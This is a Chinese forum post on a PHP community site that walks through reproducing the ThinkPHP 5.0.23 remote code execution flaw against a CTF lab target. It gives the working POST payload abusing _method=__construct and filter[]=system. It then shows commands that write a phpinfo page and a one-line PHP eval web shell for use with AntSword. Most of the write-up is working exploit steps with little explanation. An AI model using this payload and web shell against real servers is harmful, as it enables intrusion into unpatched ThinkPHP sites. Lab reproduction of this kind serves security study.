讨论社区  /   日志  /   帖子详情
thinkphp5.0.23
2023-03-29 23:03:03
176
{{single.collect_count}}

Thinkphp5.0.23 rce(远程代码执行)的漏洞复现

漏洞形成原因

框架介绍:

ThinkPHP是一款运用极广的PHP开发框架。

漏洞引入:

其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

Burp抓包修改传参方式为Post,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd为系统执行命令可进行一系列操作。

靶场ip:http://node4.buuoj.cn:28700/

添加url后缀index.php?s=captcha

构造方法_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd  

这里我们可以用hackebar或者bp抓包修改

我用的是maxhackbar

 

后面就可以修改id来进行操作

Id改为

echo "<?php phpinfo(); ?>" > info.php

 

http://node4.buuoj.cn:28700/info.php

 

Info中有

 

或者尝试写入一句话

进行连接蚁剑

echo '<?php eval($_POST[aaa]); ?>' > shell.php

 

回帖
全部回帖({{commentCount}})
{{item.user.nickname}} {{item.user.group_title}} {{item.friend_time}}
{{item.content}}
{{item.comment_content_show ? '取消' : '回复'}} 删除
回帖
{{reply.user.nickname}} {{reply.user.group_title}} {{reply.friend_time}}
{{reply.content}}
{{reply.comment_content_show ? '取消' : '回复'}} 删除
回帖
收起
没有更多啦~
{{commentLoading ? '加载中...' : '查看更多评论'}}
发帖
加入PHP技术QQ群
一个专属于OneKeyAdmin的技术交流平台,记录OneKeyAdmin开发者的成长与进步。
主题帖
6221
回帖数
144
{{userInfo.nickname}} {{userInfo.group_title}}
{{userInfo.describe}}
文章
{{blog_count}}
回帖
{{blog_comment_count}}
收藏
{{blog_collect_count}}
登陆  /   注册
文章
-
评论
-
粉丝
-
热门帖子
1  WordPress Rest API 入门详解
2919
2  Thinkphp5.0 获取新增数据的ID
2815
3  thinkphp5 解决跨域问题
2370
4  Yandex企业邮箱注册
2260
5  Thinkphp6 的 where 查询条件 and 和 or 的 操作
1984
6  PHP的exec()函数用法详解
1924
7  thinkphp5使用数据库表锁
1702
8  thinkphp6 如何输出json数据
1688
9  thinkphp6配置连接微软的sqlserver数据库
1685
10  Thinkphp如何查看当前是哪个版本?查看thinkphp当前版本号的三种方法
1682

Copyright © 2021-2024 onekeyadmin.com All rights reserved 温州市万旗信息科技有限公司 版权所有  网站备案/许可证号:浙ICP备2022028513号-1